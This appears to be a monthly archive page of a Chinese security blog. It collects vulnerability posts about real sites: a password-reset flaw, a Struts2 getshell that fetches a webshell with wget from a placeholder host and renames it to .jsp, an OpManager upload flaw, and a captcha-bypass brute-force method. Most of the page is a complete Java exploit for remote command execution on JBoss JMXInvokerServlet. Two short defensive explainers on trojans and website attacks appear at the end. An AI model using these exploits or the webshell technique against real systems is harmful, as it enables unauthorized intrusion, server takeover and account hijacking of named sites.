Monthly archive: March 2015

Maimaibao arbitrary password reset vulnerability (not brute force)

Maimaibao was founded in 2006 and is one of the earliest specialized mobile e-commerce platforms in China, aiming to give farmers, migrant workers and residents of third- and fourth-tier cities equal access to shopping. Through years of enterprising, innovative work the team has grown it into the mobile B2C mall with the largest domestic market share.

a. Simple reproduction method:

1. Bind your own phone to your account, then use that phone to receive the password-change SMS.

2. Use the [Tips] position of the link below to retrieve the password; capture the request and change the username parameter, and the password of any account can be reset.

http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do

b. Complex reproduction method:

1. The problem exists in the WAP version; the password is reset through the following link

Continue reading

JBoss JMXInvokerServlet JMXInvoker 0.3 – Remote Command Execution


/*
 * JBoss JMXInvokerServlet Remote Command Execution
 * JMXInvoker.java v0.3 - Luca Carettoni @_ikki
 *
 * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).
 * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
 * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
 * and the "JMX Console" are protected or disabled.
 *
 * [FAQ]
 *
 * Q: Is my target vulnerable?
 * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
 *
 * Q: How to fix it?
 * A: Enable authentication in "jmx-invoker-service.xml"
 *
 * Q: Is this exploit version-dependent?
 * A: Unfortunately, yes. A hash value is used to properly invoke a method.
 *    At least comparing version 4.x and 5.x, these hashes are different.
 *
 * Q: How to compile and launch it?
 * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
 *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
 *    Yes, it's a Java exploit. I can already see some of you complaining....
 */

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.ConnectException;
import java.net.HttpURLConnection;
import java.net.URL;
import javax.management.MalformedObjectNameException;
import javax.management.ObjectName;
import org.jboss.invocation.MarshalledInvocation; // within jboss.jar (look into the original JBoss installation dir)

// Class name matches the JMXInvoker.java file named in the compile instructions above
public class JMXInvoker {

    //---------> CHANGE ME <---------
    static final int hash = 647347722; // Weaponized against JBoss 4.0.3SP1
    static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";
    static final String cmd = "touch /tmp/exectest";
    //-------------------------------

    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

        System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

        // Create a malicious Java serialized object
        MarshalledInvocation payload = new MarshalledInvocation();
        payload.setObjectName(new Integer(hash));

        // Executes the MBean invoke operation
        Class<?> c = Class.forName("javax.management.MBeanServerConnection");
        Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);
        payload.setMethod(method);

        // Define MBean's name, operation and pars
        Object myObj[] = new Object[4];
        // MBean object name
        myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
        // Operation name
        myObj[1] = new String("createScriptDeployment");
        // Actual parameters
        myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
        // Operation signature
        myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

        payload.setArguments(myObj);
        System.out.println("\n--[*] MarshalledInvocation object created");
        // For debugging - visualize the raw object
        // System.out.println(dump(payload));

        // Serialize the object
        try {
            // Send the payload
            URL server = new URL(url);
            HttpURLConnection conn = (HttpURLConnection) server.openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            conn.setDoInput(true);
            conn.setUseCaches(false);
            conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");
            conn.setRequestProperty("Connection", "keep-alive");
            conn.setRequestProperty("User-Agent", "Java/1.6.0_06");
            conn.setRequestProperty("Content-Type", "application/octet-stream");
            conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");
            conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

            ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());
            wr.writeObject(payload);
            System.out.println("\n--[*] MarshalledInvocation object serialized");
            System.out.println("\n--[*] Sending payload...");
            wr.flush();
            wr.close();

            // Get the response
            InputStream is = conn.getInputStream();
            BufferedReader rd = new BufferedReader(new InputStreamReader(is));
            String line;
            StringBuffer response = new StringBuffer();
            while ((line = rd.readLine()) != null) {
                response.append(line);
            }
            rd.close();

            if (response.indexOf("Script Name") != -1) {
                System.out.println("\n--[*] \"" + cmd + "\" successfully executed");
            } else {
                System.out.println("\n--[!] An invocation error occurred...");
            }
        } catch (ConnectException cex) {
            System.out.println("\n--[!] A connection error occurred...");
        } catch (IOException ex) {
            ex.printStackTrace();
        }
    }

    /*
     * Raw dump of generic Java Objects
     */
    static String dump(Object o) {
        StringBuffer buffer = new StringBuffer();
        Class<?> oClass = o.getClass();

        if (oClass.isArray()) {
            buffer.append("[");

            for (int i = 0; i < Array.getLength(o); i++) {
                if (i > 0) {
                    buffer.append(",\n");
                }
                Object value = Array.get(o, i);
                buffer.append(value.getClass().isArray() ? dump(value) : value);
            }
            buffer.append("]");
        } else {
            buffer.append("{");
            while (oClass != null) {
                Field[] fields = oClass.getDeclaredFields();
                for (int i = 0; i < fields.length; i++) {
                    if (buffer.length() > 1) {
                        buffer.append(",\n");
                    }
                    fields[i].setAccessible(true);
                    buffer.append(fields[i].getName());
                    buffer.append("=");
                    try {
                        Object value = fields[i].get(o);
                        if (value != null) {
                            buffer.append(value.getClass().isArray() ? dump(value) : value);
                        }
                    } catch (IllegalAccessException e) {
                    }
                }
                oClass = oClass.getSuperclass();
            }
            buffer.append("}");
        }
        return buffer.toString();
    }
}

from:

Continue reading

China Mobile mobile wallet service getshell (involves multiple databases and multiple neighbouring sites; could allow APK replacement)


struts2

Address: http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl=

The server is restricted, so wget cannot fetch the shell directly; a small trick bypasses this.

First download the file in .txt format, then rename it to .jsp with the mv command

wget -P 绝对路径 http://www.xxx.com/shell.txt

mv 绝对路径/shell.txt 绝对路径/shell.jsp

root privileges

Continue reading

JBoss JMXInvokerServlet JMXInvoker 0.3 remote command execution vulnerability



How to check whether your computer has been compromised by a hacker's trojan

When using your computer you may run into situations like these: the machine suddenly freezes, or sometimes restarts on its own; files go missing for no reason; the desktop refreshes slowly; the hard disk is reading and writing frantically although no large program is running; the system inexplicably searches the floppy drive; the antivirus and firewall raise alerts; the system gets slower and slower. When this happens you should be careful.

First reaction (a good habit can often reduce the damage suffered): press CTRL+ALT+DEL to bring up the task list and see what programs are running. Pay extra attention to any unfamiliar program. Generally speaking, none of the programs listed in Task Manager have a negative effect on the basic operation of the system (note: "basic operation" is meant here; to be clear up front, this point is the result of research I found online), so you can close some suspicious programs and watch what happens. If some abnormal behaviour returns to normal, you can tentatively conclude that a trojan is present. If you find several programs running under the same name, possibly increasing in number over time, that is also a suspicious sign and deserves special attention. If you only notice these symptoms after connecting to the Internet or a LAN, don't hesitate, go and check! (Note: some other virus could also be the cause.)

Continue reading

A mall operations monitoring system under CITIC Group has a file upload vulnerability that yields system privileges

The OpManager version is too old; attached is a verification program I wrote in Python

Affected site: http://ns1.dchnu.com

An old version of OpManager is in use and has an upload vulnerability. The system runs with admin privileges, so commands can be executed directly as SYSTEM.

I wrote a verification program myself for simple testing, so there is no need to go through the hassle of Metasploit.

Continue reading

Multiple CMS backends can be brute-forced by bypassing their protection

1. Phpcms

Phpcms includes a phpsso_server.

After one brute-force attempt, the code value in the Session is not refreshed, regardless of whether the account and password were correct.

The login page must not be opened again: if it is opened, the captcha page loads and the code value changes.

Moreover, if the username is wrong, the output is "username not found";

if the password is wrong, the output is "wrong password".

Based on the above, after entering a correct captcha once, we can import the request into the Intruder module and brute-force it.

So

Brute-force method: enter a correct captcha once, then capture the request

Brute-force target: account + password (in separate passes)

Continue reading

Common website attack methods and defenses (plain-language beginner's edition)

As a webmaster who works hard at editing and promotion just to earn a little advertising revenue, once the site's traffic grows you constantly face attacks. My site has twice died or been paralysed by attacks: the first time my DedeCMS site was taken down when gambling content was injected across the whole site, and the second, which I have just been through, was a traffic attack that repeatedly paralysed the site and caused traffic fluctuations. So I have summarised the common website attack methods and defenses for my own reference and everyone else's. Since I am a beginner in security myself, this is written by category in language a beginner can understand; if the summary is wrong or incomplete, I hope the experts will kindly correct me.

Type 1: Web page tampering

Attack description: targets the website's program, plants a trojan (webshell, cross-site scripting), tampers with pages, adds hidden links or embeds content that does not belong to the site, or even creates large numbers of directory pages; gambling attacks on DedeCMS are the most common.

Continue reading